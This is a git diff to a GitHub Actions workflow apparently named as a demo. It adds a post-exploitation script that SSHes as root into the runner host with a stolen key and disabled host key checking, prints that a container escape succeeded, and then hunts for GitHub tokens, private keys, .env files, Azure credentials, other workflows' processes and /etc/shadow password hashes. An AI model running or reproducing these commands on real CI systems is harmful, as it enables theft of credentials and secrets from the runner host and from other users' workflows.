--- a/.github/workflows/github-actions-demo.yml
+++ b/.github/workflows/github-actions-demo.yml
@@ -24,17 +24,64 @@ jobs:
           # Get host IP
           HOST_IP=$(hostname -I | awk '{print $1}')
           
-          # Check if root SSH is allowed
-          echo "=== Checking SSH config ==="
-          sudo cat /mnt/host/etc/ssh/sshd_config | grep PermitRootLogin
-          
-          # SSH as ROOT
+          # SSH as ROOT and find impact
           ssh -i /tmp/root_key -o StrictHostKeyChecking=no -T root@$HOST_IP << 'EOF'
-          echo "=== ESCALATED TO ROOT ON HOST ==="
+          echo "=== CONTAINER ESCAPE SUCCESSFUL - ROOT ON HOST ==="
           whoami
-          id
           hostname
-          cd ../../../../../.. && sudo cat /etc/shadow | head -3
-          docker ps
+          id
+          uname -a
+          echo ""
+          
+          echo "=== SEARCHING FOR SENSITIVE DATA ==="
+          
+          # Find all workflow runs
+          echo "--- Workflow Directories ---"
+          find /home/runner/_work -type d -maxdepth 3 2>/dev/null | head -20
+          
+          # Find secrets and tokens
+          echo "--- Searching for GitHub Tokens ---"
+          grep -r "ghp_\|ghs_\|github_pat_" /home/runner/_work 2>/dev/null | head -10 || echo "No tokens found in grep"
+          
+          # Find credential files
+          echo "--- Credential Files ---"
+          find /home/runner -name "*.key" -o -name "*.pem" -o -name ".env" -o -name "*secret*" 2>/dev/null | head -20
+          
+          # Check Docker
+          echo "--- Docker Status ---"
+          docker ps -a
+          docker images | head -10
+          
+          # Find all users
+          echo "--- System Users ---"
+          cat /etc/passwd | grep -v "nologin\|false" | tail -10
+          
+          # Check for other workflows running
+          echo "--- Running Processes (Other Workflows) ---"
+          ps aux | grep -E "Runner.Listener|Runner.Worker" | grep -v grep | head -10
+          
+          # Find Azure credentials
+          echo "--- Azure/Cloud Credentials ---"
+          find /home -name "*azure*" -o -name "*credentials*" 2>/dev/null | head -10
+          
+          # Check environment variables in runner
+          echo "--- Runner Environment Files ---"
+          find /home/runner -name ".env*" -o -name "*.env" 2>/dev/null
+          
+          # Check systemd for GitHub Actions services
+          echo "--- GitHub Actions Services ---"
+          systemctl list-units --type=service | grep -i "runner\|github\|actions" || echo "No service units found"
+          
+          # Check /tmp for secrets
+          echo "--- Temporary Secrets ---"
+          ls -la /tmp/*.key /tmp/*.pem /tmp/*token* 2>/dev/null || echo "No temp secrets"
+          
+          # Get shadow file (password hashes)
+          echo "--- System Shadow File ---"
+          cat /etc/shadow | head -5
+          
+          # Check system info
+          echo "--- System Info ---"
           lsblk
+          df -h | head -10
           EOF
